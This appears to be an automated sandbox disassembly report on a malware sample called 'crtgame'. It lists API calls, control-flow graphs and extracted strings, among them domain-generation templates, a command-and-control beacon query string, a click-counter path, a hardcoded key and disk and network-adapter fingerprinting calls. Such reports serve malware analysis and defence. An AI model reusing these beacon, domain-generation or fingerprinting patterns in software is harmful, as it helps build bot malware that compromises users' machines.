2c34d33 15951->15952 15953 2c34d21 GetOEMCP 15951->15953 15954 2c34d4a 15952->15954 15955 2c34d38 GetACP 15952->15955 15953->15954 15954->15932 15954->15933 15955->15954 15957 2c34d02 getSystemCP 61 API calls 15956->15957 15958 2c351cc 15957->15958 15961 2c3521d IsValidCodePage 15958->15961 15963 2c351d3 setSBCS 15958->15963 15965 2c35242 __setmbcp_nolock 15958->15965 15959 2c33f6b __setmbcp_nolock 6 API calls 15960 2c3506e 15959->15960 15960->15937 15960->15938 15962 2c3522f GetCPInfo 15961->15962 15961->15963 15962->15963 15962->15965 15963->15959 15969 2c34dcf GetCPInfo 15965->15969 16035 2c38477 RtlLeaveCriticalSection 15966->16035 15968 2c35180 15968->15933 15975 2c34e07 15969->15975 15978 2c34eb1 15969->15978 15972 2c33f6b __setmbcp_nolock 6 API calls 15974 2c34f5d 15972->15974 15974->15963 15979 2c3d63d 15975->15979 15977 2c3d4e1 ___crtLCMapStringA 63 API calls 15977->15978 15978->15972 15980 2c31c9b _LocaleUpdate::_LocaleUpdate 59 API calls 15979->15980 15981 2c3d64e 15980->15981 15989 2c3d545 15981->15989 15984 2c3d4e1 15985 2c31c9b _LocaleUpdate::_LocaleUpdate 59 API calls 15984->15985 15986 2c3d4f2 15985->15986 16006 2c3d2dd 15986->16006 15990 2c3d55f 15989->15990 15991 2c3d56c MultiByteToWideChar 15989->15991 15990->15991 15992 2c3d591 15991->15992 15995 2c3d598 15991->15995 15993 2c33f6b __setmbcp_nolock 6 API calls 15992->15993 15994 2c34e68 15993->15994 15994->15984 15996 2c329cc _malloc 59 API calls 15995->15996 15998 2c3d5ba __setmbcp_nolock 15995->15998 15996->15998 15997 2c3d5f6 MultiByteToWideChar 15999 2c3d620 15997->15999 16000 2c3d610 GetStringTypeW 15997->16000 15998->15992 15998->15997 16002 2c3d527 15999->16002 16000->15999 16003 2c3d531 16002->16003 16005 2c3d542 16002->16005 16004 2c32994 ___endstdio 59 API calls 16003->16004 16003->16005 16004->16005 16005->15992 16009 2c3d2f6 MultiByteToWideChar 16006->16009 16008 2c3d355 16010 2c33f6b __setmbcp_nolock 6 API calls 16008->16010 16009->16008 16012 2c3d35c 16009->16012 16013 2c34e89 16010->16013 16011 2c3d3bb MultiByteToWideChar 16014 2c3d422 16011->16014 16015 2c3d3d4 16011->16015 16018 2c329cc _malloc 59 API calls 16012->16018 16020 2c3d384 16012->16020 16013->15977 16017 2c3d527 __freea 59 API calls 16014->16017 16031 2c3f108 16015->16031 16017->16008 16018->16020 16019 2c3d3e8 16019->16014 16021 2c3d3fe 16019->16021 16022 2c3d42a 16019->16022 16020->16008 16020->16011 16021->16014 16023 2c3f108 __crtLCMapStringA_stat LCMapStringW 16021->16023 16025 2c329cc _malloc 59 API calls 16022->16025 16028 2c3d452 16022->16028 16023->16014 16024 2c3f108 __crtLCMapStringA_stat LCMapStringW 16026 2c3d495 16024->16026 16025->16028 16027 2c3d4bd 16026->16027 16030 2c3d4af WideCharToMultiByte 16026->16030 16029 2c3d527 __freea 59 API calls 16027->16029 16028->16014 16028->16024 16029->16014 16030->16027 16032 2c3f133 __crtLCMapStringA_stat 16031->16032 16034 2c3f118 16031->16034 16033 2c3f14a LCMapStringW 16032->16033 16033->16019 16034->16019 16035->15968 16037 2c366f5 16036->16037 16038 2c366e7 16036->16038 16039 2c3587b __commit 59 API calls 16037->16039 16038->16037 16043 2c3670b 16038->16043 16040 2c366fc 16039->16040 16041 2c34915 __commit 9 API calls 16040->16041 16042 2c36706 16041->16042 16042->15459 16043->16042 16044 2c3587b __commit 59 API calls 16043->16044 16044->16040 16046 2c3cd02 RtlEncodePointer 16045->16046 16046->16046 16047 2c3cd1c 16046->16047 16047->15472 16051 2c32cc8 16048->16051 16050 2c32dcf 16050->15474 16052 2c32cd4 ___lock_fhandle 16051->16052 16059 2c37fb2 16052->16059 16058 2c32cfb ___lock_fhandle 16058->16050 16060 2c3830d __lock 59 API calls 16059->16060 16061 2c32cdd 16060->16061 16062 2c32d0c RtlDecodePointer RtlDecodePointer 16061->16062 16063 2c32ce9 16062->16063 16064 2c32d39 16062->16064 16073 2c32d06 16063->16073 16064->16063 16076 2c38b7d 16064->16076 16066 2c32d9c RtlEncodePointer RtlEncodePointer 16066->16063 16067 2c32d70 16067->16063 16070 2c3851b __realloc_crt 62 API calls 16067->16070 16071 2c32d8a RtlEncodePointer 16067->16071 16068 2c32d4b 16068->16066 16068->16067 16083 2c3851b 16068->16083 16072 2c32d84 16070->16072 16071->16066 16072->16063 16072->16071 16110 2c37fbb 16073->16110 16077 2c38b86 16076->16077 16078 2c38b9b RtlSizeHeap 16076->16078 16079 2c3587b __commit 59 API calls 16077->16079 16078->16068 16080 2c38b8b 16079->16080 16081 2c34915 __commit 9 API calls 16080->16081 16082 2c38b96 16081->16082 16082->16068 16085 2c38522 16083->16085 16086 2c3855f 16085->16086 16088 2c3fdc4 16085->16088 16109 2c38f25 Sleep 16085->16109 16086->16067 16089 2c3fdd8 16088->16089 16090 2c3fdcd 16088->16090 16092 2c3fde0 16089->16092 16103 2c3fded 16089->16103 16091 2c329cc _malloc 59 API calls 16090->16091 16093 2c3fdd5 16091->16093 16094 2c32994 ___endstdio 59 API calls 16092->16094 16093->16085 16106 2c3fde8 __dosmaperr 16094->16106 16095 2c3fe25 16096 2c37c23 __calloc_impl RtlDecodePointer 16095->16096 16098 2c3fe2b 16096->16098 16097 2c3fdf5 RtlReAllocateHeap 16097->16103 16097->16106 16099 2c3587b __commit 59 API calls 16098->16099 16099->16106 16100 2c3fe55 16101 2c3587b __commit 59 API calls 16100->16101 16104 2c3fe5a GetLastError 16101->16104 16102 2c37c23 __calloc_impl RtlDecodePointer 16102->16103 16103->16095 16103->16097 16103->16100 16103->16102 16105 2c3fe3d 16103->16105 16104->16106 16107 2c3587b __commit 59 API calls 16105->16107 16106->16085 16108 2c3fe42 GetLastError 16107->16108 16108->16106 16109->16085 16113 2c38477 RtlLeaveCriticalSection 16110->16113 16112 2c32d0b 16112->16058 16113->16112 16115 2c38be3 TlsFree 16114->16115 16116 2c38bdf 16114->16116 16115->15478 16116->15478 16118 2c3fee3 16117->16118 16123 2c3fefe 16117->16123 16119 2c3feef 16118->16119 16118->16123 16120 2c3587b __commit 58 API calls 16119->16120 16122 2c3fef4 16120->16122 16121 2c3ff0e RtlAllocateHeap 16121->16122 16121->16123 16122->15525 16123->16121 16123->16122 16124 2c37c23 __calloc_impl RtlDecodePointer 16123->16124 16124->16123 16125->15527 16132 2c38477 RtlLeaveCriticalSection 16126->16132 16128 2c35764 16128->15538 16133 2c38477 RtlLeaveCriticalSection 16129->16133 16131 2c357b2 16131->15541 16132->16128 16133->16131 16136 2c3551b ___lock_fhandle 16134->16136 16135 2c35534 16137 2c35543 16135->16137 16140 2c32994 ___endstdio 59 API calls 16135->16140 16136->16135 16138 2c35623 ___lock_fhandle 16136->16138 16139 2c32994 ___endstdio 59 API calls 16136->16139 16141 2c35552 16137->16141 16142 2c32994 ___endstdio 59 API calls 16137->16142 16138->15555 16139->16135 16140->16137 16143 2c35561 16141->16143 16144 2c32994 ___endstdio 59 API calls 16141->16144 16142->16141 16145 2c35570 16143->16145 16146 2c32994 ___endstdio 59 API calls 16143->16146 16144->16143 16147 2c32994 ___endstdio 59 API calls 16145->16147 16148 2c3557f 16145->16148 16146->16145 16147->16148 16149 2c32994 ___endstdio 59 API calls 16148->16149 16151 2c3558e 16148->16151 16149->16151 16150 2c355a0 16153 2c3830d __lock 59 API calls 16150->16153 16151->16150 16152 2c32994 ___endstdio 59 API calls 16151->16152 16152->16150 16156 2c355a8 16153->16156 16154 2c355cb 16166 2c3562f 16154->16166 16156->16154 16158 2c32994 ___endstdio 59 API calls 16156->16158 16158->16154 16159 2c3830d __lock 59 API calls 16164 2c355df ___removelocaleref 16159->16164 16160 2c35610 16169 2c3563b 16160->16169 16163 2c32994 ___endstdio 59 API calls 16163->16138 16164->16160 16165 2c349e5 ___freetlocinfo 59 API calls 16164->16165 16165->16160 16172 2c38477 RtlLeaveCriticalSection 16166->16172 16168 2c355d8 16168->16159 16173 2c38477 RtlLeaveCriticalSection 16169->16173 16171 2c3561d 16171->16163 16172->16168 16173->16171 16174 2c64f43 16175 2c7b90e SHGetSpecialFolderPathA 16174->16175 16176 2c9c61a 16175->16176 16177 2c25f2a RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 16178 2c25faa GetTickCount 16177->16178 16256 2c2f1fa 16177->16256 16265 2c25c4f 16178->16265 16427 2c2f2af CreateFileA 16256->16427 16261 2c2f252 CreateFileA 16262 2c2f29e 16261->16262 16263 2c2f276 GetFileTime CloseHandle 16261->16263 16262->16178 16263->16262 16264 2c2f290 16263->16264 16264->16262 16266 2c329cc _malloc 59 API calls 16265->16266 16267 2c25c63 __setmbcp_nolock 16266->16267 16268 2c25c76 SHGetSpecialFolderPathW lstrcpyW lstrcatW CreateFileW 16267->16268 16269 2c25cd4 16268->16269 16270 2c25cb5 ReadFile CloseHandle 16268->16270 16442 2c3351c GetSystemTimeAsFileTime 16269->16442 16272 2c25d1a 16270->16272 16444 2c255a8 16272->16444 16273 2c25ce0 CreateFileW 16273->16272 16275 2c25d01 WriteFile CloseHandle 16273->16275 16275->16272 16428 2c2f234 16427->16428 16431 2c2f2e0 16427->16431 16434 2c2f3b3 LoadLibraryA 16428->16434 16429 2c2f2f8 DeviceIoControl 16429->16431 16430 2c2f3a1 CloseHandle 16430->16428 16431->16429 16431->16430 16432 2c2f36d GetLastError 16431->16432 16433 2c3356d _Allocate 60 API calls 16431->16433 16432->16430 16432->16431 16433->16431 16435 2c2f23c GetWindowsDirectoryA 16434->16435 16436 2c2f3dc GetProcAddress 16434->16436 16435->16261 16435->16262 16437 2c2f48f FreeLibrary 16436->16437 16440 2c2f3f0 16436->16440 16437->16435 16438 2c2f402 GetAdaptersInfo 16438->16440 16439 2c2f48a 16439->16437 16440->16438 16440->16439 16440->16440 16441 2c3356d _Allocate 60 API calls 16440->16441 16441->16440 16443 2c3354a __aulldiv 16442->16443 16443->16273 16445 2c329cc _malloc 59 API calls 16444->16445 16446 2c255c4 16445->16446 17779 2c69978 17780 2c6a617 CreateFileA 17779->17780 17782 2c7bfa8 17780->17782 17783 2c7dfd8 CreateFileW 17784 2c2104d 17785 2c32dc4 __cinit 68 API calls 17784->17785 17786 2c21057 17785->17786 17789 2c21aa9 InterlockedIncrement 17786->17789 17790 2c21ac5 WSAStartup InterlockedExchange 17789->17790 17791 2c2105c 17789->17791 17790->17791
                                                                                                            APIs
                                                                                                            • RtlInitializeCriticalSection.NTDLL(02C573D8), ref: 02C25F59
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02C25F70
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02C25F79
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02C25F88
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02C25F8B
                                                                                                              • Part of subcall function 02C2F1FA: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000000,00000000), ref: 02C2F248
                                                                                                              • Part of subcall function 02C2F1FA: CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 02C2F269
                                                                                                              • Part of subcall function 02C2F1FA: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02C2F27D
                                                                                                              • Part of subcall function 02C2F1FA: CloseHandle.KERNEL32(00000000), ref: 02C2F286
                                                                                                            • GetTickCount.KERNEL32 ref: 02C25FCC
                                                                                                            • GetVersionExA.KERNEL32(02C57030), ref: 02C25FF9
                                                                                                            • _malloc.LIBCMT ref: 02C26023
                                                                                                            • _malloc.LIBCMT ref: 02C26033
                                                                                                            • _malloc.LIBCMT ref: 02C26041
                                                                                                            • _malloc.LIBCMT ref: 02C2604C
                                                                                                            • _malloc.LIBCMT ref: 02C26057
                                                                                                            • _malloc.LIBCMT ref: 02C26062
                                                                                                            • _malloc.LIBCMT ref: 02C2606D
                                                                                                            • _malloc.LIBCMT ref: 02C2607C
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02C26093
                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02C2609C
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C260AB
                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02C260AE
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C260B9
                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02C260BC
                                                                                                            • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C260F6
                                                                                                            • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C26103
                                                                                                            • _malloc.LIBCMT ref: 02C26127
                                                                                                              • Part of subcall function 02C329CC: __FF_MSGBANNER.LIBCMT ref: 02C329E3
                                                                                                              • Part of subcall function 02C329CC: __NMSG_WRITE.LIBCMT ref: 02C329EA
                                                                                                              • Part of subcall function 02C329CC: RtlAllocateHeap.NTDLL(00990000,00000000,00000001), ref: 02C32A0F
                                                                                                            • _malloc.LIBCMT ref: 02C26135
                                                                                                            • _malloc.LIBCMT ref: 02C2613C
                                                                                                            • _malloc.LIBCMT ref: 02C26160
                                                                                                            • QueryPerformanceCounter.KERNEL32(00000200), ref: 02C26170
                                                                                                            • Sleep.KERNELBASE ref: 02C2617E
                                                                                                            • _malloc.LIBCMT ref: 02C2618A
                                                                                                            • _malloc.LIBCMT ref: 02C26197
                                                                                                            • Sleep.KERNELBASE(00001388), ref: 02C261D8
                                                                                                            • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C261E3
                                                                                                            • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C261F4
                                                                                                            • GetTickCount.KERNEL32 ref: 02C262FB
                                                                                                            • wsprintfA.USER32 ref: 02C26C51
                                                                                                            • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 02C26D53
                                                                                                            • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02C26D7B
                                                                                                            • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02C26D93
                                                                                                            • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02C26DAB
                                                                                                            • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200,00000000), ref: 02C26DD4
                                                                                                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02C26DF3
                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02C26E0D
                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02C26E18
                                                                                                            • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C26E88
                                                                                                            • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C26E99
                                                                                                            • _malloc.LIBCMT ref: 02C26F20
                                                                                                            • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C26F32
                                                                                                            • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C26F3E
                                                                                                            • _malloc.LIBCMT ref: 02C27012
                                                                                                            • _strtok.LIBCMT ref: 02C27043
                                                                                                            • _swscanf.LIBCMT ref: 02C2705A
                                                                                                            • _strtok.LIBCMT ref: 02C27071
                                                                                                            • Sleep.KERNEL32(000007D0), ref: 02C27178
                                                                                                            • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C271F9
                                                                                                            • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C2720B
                                                                                                            • _sprintf.LIBCMT ref: 02C272A0
                                                                                                            • RtlEnterCriticalSection.NTDLL(00000020), ref: 02C27364
                                                                                                            • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C27398
                                                                                                              • Part of subcall function 02C25D33: _malloc.LIBCMT ref: 02C25D41
                                                                                                            • _malloc.LIBCMT ref: 02C27599
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _malloc$CriticalSection$Internet$Heap$EnterLeave$Handle$Allocate$CloseFileOptionProcessSleep$AddressCountModuleOpenProcTick_strtok$CounterCreateDirectoryInitializePerformanceQueryReadTimeVersionWindows_sprintf_swscanfwsprintf
                                                                                                            • String ID: $%d;$/click/?counter=$<htm$Host: %s$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$a%c%c%c%c%c%c.ru$auth_ip$auth_swith$b%c%c%c%c%c%c.com$block$c%c%c%c%c%c%c.net$client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d$connect$d%c%c%c%c%c%c.info$disconnect$e%c%c%c%c%c%c.ua$f%c%c%c%c%c%c.ru$g%c%c%c%c%c%c.com$h%c%c%c%c%c%c.net$http://$i%c%c%c%c%c%c.info$i4hiea56#7b&dfw3$idle$j%c%c%c%c%c%c.info$k%c%c%c%c%c%c.ua$l%c%c%c%c%c%c.ru$m%c%c%c%c%c%c.com$n%c%c%c%c%c%c.net$ntdll.dll$o%c%c%c%c%c%c.info$p%c%c%c%c%c%c.ua$q%c%c%c%c%c%c.ru$r%c%c%c%c%c%c.com$s%c%c%c%c%c%c.net$sprintf$strcat$t%c%c%c%c%c%c.info$u%c%c%c%c%c%c.ua$updips$updurls$urls$v%c%c%c%c%c%c.ru$w%c%c%c%c%c%c.com$x%c%c%c%c%c%c.net$y%c%c%c%c%c%c.info$z%c%c%c%c%c%c.ua
                                                                                                            • API String ID: 3871695393-1381308451
                                                                                                            • Opcode ID: ee7439defd963c184bbea21a84ebefd5f48b494ea15a4454c3b5ef931aadc38c
                                                                                                            • Instruction ID: 2c360e329bf47e2816b776052521c104f4899a28cb0984014c748f58d634a8a2
                                                                                                            • Opcode Fuzzy Hash: ee7439defd963c184bbea21a84ebefd5f48b494ea15a4454c3b5ef931aadc38c
                                                                                                            • Instruction Fuzzy Hash: 06D20CB36187A05ED315AB1C9C81B7FFBDC6F89704F59092DF5D5C6142CA28C609CBA2
                                                                                                            APIs
                                                                                                            • RtlInitializeCriticalSection.NTDLL(02C573D8), ref: 02C25F59
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02C25F70
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02C25F79
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02C25F88
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02C25F8B
                                                                                                            • GetTickCount.KERNEL32 ref: 02C25FCC
                                                                                                            • GetVersionExA.KERNEL32(02C57030), ref: 02C25FF9
                                                                                                            • _malloc.LIBCMT ref: 02C26023
                                                                                                            • _malloc.LIBCMT ref: 02C26033
                                                                                                            • _malloc.LIBCMT ref: 02C26041
                                                                                                            • _malloc.LIBCMT ref: 02C2604C
                                                                                                            • _malloc.LIBCMT ref: 02C26057
                                                                                                            • _malloc.LIBCMT ref: 02C26062
                                                                                                            • _malloc.LIBCMT ref: 02C2606D
                                                                                                            • _malloc.LIBCMT ref: 02C2607C
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02C26093
                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02C2609C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _malloc$AddressHandleHeapModuleProc$AllocateCountCriticalInitializeProcessSectionTickVersion
                                                                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d$i4hiea56#7b&dfw3$ntdll.dll$sprintf$strcat$w%c%c%c%c%c%c.com
                                                                                                            • API String ID: 3594589716-2290804818
                                                                                                            • Opcode ID: eaf2b1e52fcc612875be831a798f630697c8dbc3e010160565f40b8406575a6c
                                                                                                            • Instruction ID: df88a764ddef4432c61551c3c48721b72bda065afdd7279d43e764c09a48ae5c
                                                                                                            • Opcode Fuzzy Hash: eaf2b1e52fcc612875be831a798f630697c8dbc3e010160565f40b8406575a6c
                                                                                                            • Instruction Fuzzy Hash: 95D12772D443609FD721AB349C44B6BBFE8AF89704F140D2DF984A7281DB749948CBA2

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 821 2c2f3b3-2c2f3d6 LoadLibraryA 822 2c2f496-2c2f49d 821->822 823 2c2f3dc-2c2f3ea GetProcAddress 821->823 824 2c2f3f0-2c2f400 823->824 825 2c2f48f-2c2f490 FreeLibrary 823->825 826 2c2f402-2c2f40e GetAdaptersInfo 824->826 825->822 827 2c2f410 826->827 828 2c2f446-2c2f44e 826->828 831 2c2f412-2c2f419 827->831 829 2c2f450-2c2f456 call 2c331c9 828->829 830 2c2f457-2c2f45c 828->830 829->830 833 2c2f48a-2c2f48e 830->833 834 2c2f45e-2c2f461 830->834 835 2c2f423-2c2f42b 831->835 836 2c2f41b-2c2f41f 831->836 833->825 834->833 839 2c2f463-2c2f468 834->839 837 2c2f42e-2c2f433 835->837 836->831 840 2c2f421 836->840 837->837 841 2c2f435-2c2f442 call 2c2f095 837->841 842 2c2f475-2c2f480 call 2c3356d 839->842 843 2c2f46a-2c2f472 839->843 840->828 841->828 842->833 848 2c2f482-2c2f485 842->848 843->842 848->826
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 02C2F3C9
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02C2F3E2
                                                                                                            • GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 02C2F407
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 02C2F490
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                                            • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                                            • API String ID: 514930453-3114217049
                                                                                                            • Opcode ID: 58640a0b3136c6b08164889623e75c04f6f2b7d22794da7079e344f0ee65dfa5
                                                                                                            • Instruction ID: c0283bcc1896b9ad931ca7354b4556dc93e50b63e604dea88003a8080983bbf2
                                                                                                            • Opcode Fuzzy Hash: 58640a0b3136c6b08164889623e75c04f6f2b7d22794da7079e344f0ee65dfa5
                                                                                                            • Instruction Fuzzy Hash: 5621A275A0422DABDB10DFA898847EEBBF8BF48314F0441BDD545E7601DFB09A49CBA0

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 849 2c22b95-2c22baf 850 2c22bb1-2c22bb9 call 2c30530 849->850 851 2c22bc7-2c22bcb 849->851 858 2c22bbf-2c22bc2 850->858 853 2c22bdf 851->853 854 2c22bcd-2c22bd0 851->854 857 2c22be2-2c22c11 WSASetLastError WSARecv call 2c29ea8 853->857 854->853 856 2c22bd2-2c22bdd call 2c30530 854->856 856->858 863 2c22c16-2c22c1d 857->863 861 2c22d30 858->861 864 2c22d32-2c22d38 861->864 865 2c22c1f-2c22c2a call 2c30530 863->865 866 2c22c2c-2c22c32 863->866 874 2c22c3f-2c22c42 865->874 867 2c22c46-2c22c48 866->867 868 2c22c34-2c22c39 call 2c30530 866->868 872 2c22c4a-2c22c4d 867->872 873 2c22c4f-2c22c60 call 2c30530 867->873 868->874 876 2c22c66-2c22c69 872->876 873->864 873->876 874->867 879 2c22c73-2c22c76 876->879 880 2c22c6b-2c22c6d 876->880 879->861 882 2c22c7c-2c22c9a call 2c30530 call 2c2166f 879->882 880->879 881 2c22d22-2c22d2d call 2c21996 880->881 881->861 889 2c22cbc-2c22cfa WSASetLastError select call 2c29ea8 882->889 890 2c22c9c-2c22cba call 2c30530 call 2c2166f 882->890 896 2c22d08 889->896 897 2c22cfc-2c22d06 call 2c30530 889->897 890->861 890->889 900 2c22d15-2c22d17 896->900 901 2c22d0a-2c22d12 call 2c30530 896->901 903 2c22d19-2c22d1d 897->903 900->861 900->903 901->900 903->857
                                                                                                            APIs
                                                                                                            • WSASetLastError.WS2_32(00000000,00000000,505C3A43,00000000), ref: 02C22BE4
                                                                                                            • WSARecv.WS2_32(?,?,00000002,?,?,00000000,00000000), ref: 02C22C07
                                                                                                              • Part of subcall function 02C29EA8: WSAGetLastError.WS2_32(?,00000080,00000017,02C23114), ref: 02C29EB6
                                                                                                            • WSASetLastError.WS2_32(?,?,?,?,00000000), ref: 02C22CD3
                                                                                                            • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02C22CE7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$Recvselect
                                                                                                            • String ID: 3'
                                                                                                            • API String ID: 886190287-280543908
                                                                                                            • Opcode ID: 11a1036687d8b95e4e0923e686fea12013bb420f4d27589a7c3e9b0e5ee8671e
                                                                                                            • Instruction ID: 58a3073527039b8fdb8422fb844bc2cf7434689e8aed7f0925dff2f29b937eb4
                                                                                                            • Opcode Fuzzy Hash: 11a1036687d8b95e4e0923e686fea12013bb420f4d27589a7c3e9b0e5ee8671e
                                                                                                            • Instruction Fuzzy Hash: BC415AB29143158FD721AF74C90476BBBE9EF84354F100D5EE89987280EFB4D948CBA2

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 906 2c2f2af-2c2f2da CreateFileA 907 2c2f2e0-2c2f2f5 906->907 908 2c2f3ab-2c2f3b2 906->908 909 2c2f2f8-2c2f31a DeviceIoControl 907->909 910 2c2f353-2c2f35b 909->910 911 2c2f31c-2c2f324 909->911 912 2c2f364-2c2f366 910->912 913 2c2f35d-2c2f363 call 2c331c9 910->913 914 2c2f326-2c2f32b 911->914 915 2c2f32d-2c2f332 911->915 917 2c2f3a1-2c2f3aa CloseHandle 912->917 918 2c2f368-2c2f36b 912->918 913->912 914->910 915->910 919 2c2f334-2c2f33c 915->919 917->908 921 2c2f387-2c2f394 call 2c3356d 918->921 922 2c2f36d-2c2f376 GetLastError 918->922 923 2c2f33f-2c2f344 919->923 921->917 930 2c2f396-2c2f39c 921->930 922->917 924 2c2f378-2c2f37b 922->924 923->923 926 2c2f346-2c2f352 call 2c2f095 923->926 924->921 927 2c2f37d-2c2f384 924->927 926->910 927->921 930->909
                                                                                                            APIs
                                                                                                            • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 02C2F2CE
                                                                                                            • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,00000000,00000000), ref: 02C2F30C
                                                                                                            • GetLastError.KERNEL32 ref: 02C2F36D
                                                                                                            • CloseHandle.KERNELBASE(?), ref: 02C2F3A4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                                            • String ID: \\.\PhysicalDrive0
                                                                                                            • API String ID: 4026078076-1180397377
                                                                                                            • Opcode ID: 0f6d32e7d26319931782adc7880a4aa72c2c13d003589e6eed29f699d6d073a1
                                                                                                            • Instruction ID: 5550f969966aeff37036e22af199534440e6b54f8cf3883b0da8a92b65b27570
                                                                                                            • Opcode Fuzzy Hash: 0f6d32e7d26319931782adc7880a4aa72c2c13d003589e6eed29f699d6d073a1
                                                                                                            • Instruction Fuzzy Hash: 6A31E271D0022DABDB24CF95C984BAEBBB9EF84714F20416DE109A3680CB745B08CBD0

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C21D11
                                                                                                            • GetLastError.KERNEL32 ref: 02C21D23
                                                                                                              • Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717
                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C21D59
                                                                                                            • GetLastError.KERNEL32 ref: 02C21D6B
                                                                                                            • __beginthreadex.LIBCMT ref: 02C21DB1
                                                                                                            • GetLastError.KERNEL32 ref: 02C21DC6
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C21DDD
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C21DEC
